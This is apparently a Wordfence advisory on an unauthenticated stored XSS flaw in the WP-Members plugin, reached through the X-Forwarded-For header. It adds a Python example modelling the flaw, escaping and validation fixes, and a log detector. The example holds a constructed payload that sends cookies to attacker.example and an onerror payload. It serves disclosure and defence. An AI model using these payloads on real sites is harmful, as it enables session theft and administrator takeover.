Unauthenticated Stored Cross-Site Scripting Vulnerability Patched in WP-Members Membership Plugin – $500 Bounty Awarded
🎉 Did you know we’re running a Bug Bounty Extravaganza again?
Earn over 6x our usual bounty rates, up to $10,000, for all vulnerabilities submitted through May 27th, 2024 when you opt to have Wordfence handle responsible disclosure!
On February 21st, 2024, during our second Bug Bounty Extravaganza, an Unauthenticated Stored Cross-Site Scripting vulnerability was reported to us in the WP-Members Membership Plugin, which is installed on over 60,000 sites. The vulnerability allows unauthenticated threat actors to inject arbitrary JavaScript via the X-Forwarded-For request header, which the plugin stores for logging purposes. Because the header is attacker-controlled and not tied to any account, the payload can be planted by anyone who can send a request to the site. When an administrator later views the stored value, the malicious code executes in the context of the administrator's browser session, allowing the creation of malicious administrator users as well as changes to an affected site's settings, which could lead to a complete site takeover.
Kudos to Webbernaut who responsibly disclosed this vulnerability to us through our Bug Bounty Program. Their find was rewarded with a $500 bounty. Our mission is to Secure the Web, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program. We are committed to making the WordPress ecosystem more secure, which ultimately makes the entire web more secure.
All Wordfence Premium, Wordfence Care, and Wordfence Response customers, as well as those using the free version of our plugin, are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting protection.
Our initial outreach to RocketGeek took place on February 23rd, 2024. We received a reply and disclosed details on the same day. Version 3.4.9.2, released on March 7th, 2024, protected against further exploitation of this vulnerability, but did not prevent payloads that had already been injected and stored from firing when viewed. A fully patched version addressing this issue, 3.4.9.3, was made available shortly thereafter, also on March 7th.
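The two points above, that a stored header value reaches an administrator's browser unescaped, and that an input-side fix alone does not defuse entries that were already stored, are easier to see in code. The following is an added example written for this page, not the plugin's code or Wordfence's; the plugin's real storage and rendering logic is not shown here. It models the flaw with a stand-in log store and admin view, shows the two complementary fixes (validate X-Forwarded-For as an IP list on the way in, escape on the way out), and runs a small detector over constructed access-log lines in an assumed tab-separated format. All header values, log lines and function names are constructed for illustration.

```python
import html
import ipaddress
import re

# Constructed sample inputs (not taken from the page or from the plugin).
MALICIOUS_XFF = ('203.0.113.7, <script>new Image().src="https://attacker.example/c?"'
                 '+document.cookie</script>')
BENIGN_XFF = "203.0.113.7, 198.51.100.2"

# Constructed access-log lines in an ASSUMED tab-separated format:
#   timestamp <TAB> client_ip <TAB> request <TAB> X-Forwarded-For
SAMPLE_ACCESS_LOG = [
    "2024-02-21T10:00:01Z\t10.0.0.5\tGET /wp-login.php\t" + BENIGN_XFF,
    "2024-02-21T10:00:09Z\t10.0.0.5\tPOST /wp-login.php\t" + MALICIOUS_XFF,
    "2024-02-21T10:00:12Z\t10.0.0.9\tGET /\t<img src=x onerror=alert(1)>",
    "2024-02-21T10:00:20Z\t10.0.0.3\tGET /\t",
]


def store_entry_vulnerable(headers):
    """Models the flaw: the header value is stored exactly as the client sent it."""
    return {"ip": headers.get("X-Forwarded-For", ""),
            "request": headers.get("request", "")}


def render_entry_vulnerable(entry):
    """Admin log view that concatenates the stored value into HTML unescaped."""
    return "<tr><td>{ip}</td><td>{request}</td></tr>".format(**entry)


def render_entry_safe(entry):
    """Escape on output (the role WordPress esc_html() plays in a real plugin).

    This is the fix that also neutralises payloads stored BEFORE any input
    validation existed: the stored string is unchanged, but it can no longer
    be parsed as markup by the administrator's browser.
    """
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(entry["ip"]), html.escape(entry["request"]))


def parse_xff(value):
    """Input-side validation: X-Forwarded-For must be a comma-separated list
    of IP literals. Any other token (markup, hostnames) raises ValueError."""
    ips = []
    for token in value.split(","):
        token = token.strip()
        if token:
            ips.append(str(ipaddress.ip_address(token)))  # raises on non-IP
    return ips


def store_entry_hardened(headers):
    """Validate before storing; an invalid header is recorded as empty rather
    than verbatim. Note this does nothing for entries already in the log."""
    try:
        ips = parse_xff(headers.get("X-Forwarded-For", ""))
    except ValueError:
        ips = []
    return {"ip": ", ".join(ips), "request": headers.get("request", "")}


# Rough signal for HTML/JS in a header; the authoritative check is parse_xff.
MARKUP = re.compile(r"<\s*/?\s*[a-z]|on[a-z]+\s*=|javascript:", re.I)


def find_xff_injections(lines):
    """Flag log lines whose X-Forwarded-For is not a clean IP list.

    Returns a list of (line_no, reason, raw_value) tuples.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split("\t")
        if len(fields) != 4 or not fields[3]:
            continue
        xff = fields[3]
        try:
            parse_xff(xff)
        except ValueError:
            reason = "html/script markup" if MARKUP.search(xff) else "non-IP token"
            hits.append((n, reason, xff))
    return hits


if __name__ == "__main__":
    attacker = {"X-Forwarded-For": MALICIOUS_XFF, "request": "POST /wp-login.php"}
    old_entry = store_entry_vulnerable(attacker)   # already in the log
    print("vulnerable view :", render_entry_vulnerable(old_entry))
    print("escaped view    :", render_entry_safe(old_entry))
    print("hardened store  :", store_entry_hardened(attacker))
    for hit in find_xff_injections(SAMPLE_ACCESS_LOG):
        print("log hit         :", hit)
```

Running the script shows the stored `<script>` tag surviving `render_entry_vulnerable` and being rendered inert by `render_entry_safe`, while `store_entry_hardened` refuses to record it at all; the detector flags lines 2 and 3 of the constructed log. The design point is that both layers belong in a real fix: input validation stops new entries, and output escaping is what protects administrators from entries that were stored before the patch.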
We recommend that site owners upgrade their WP-Members Membership plugin to the latest patched version, which is 3.4.9.3.
Vulnerability Summary from Wordfence Intelligence
Description: WP-Members Membership Plugin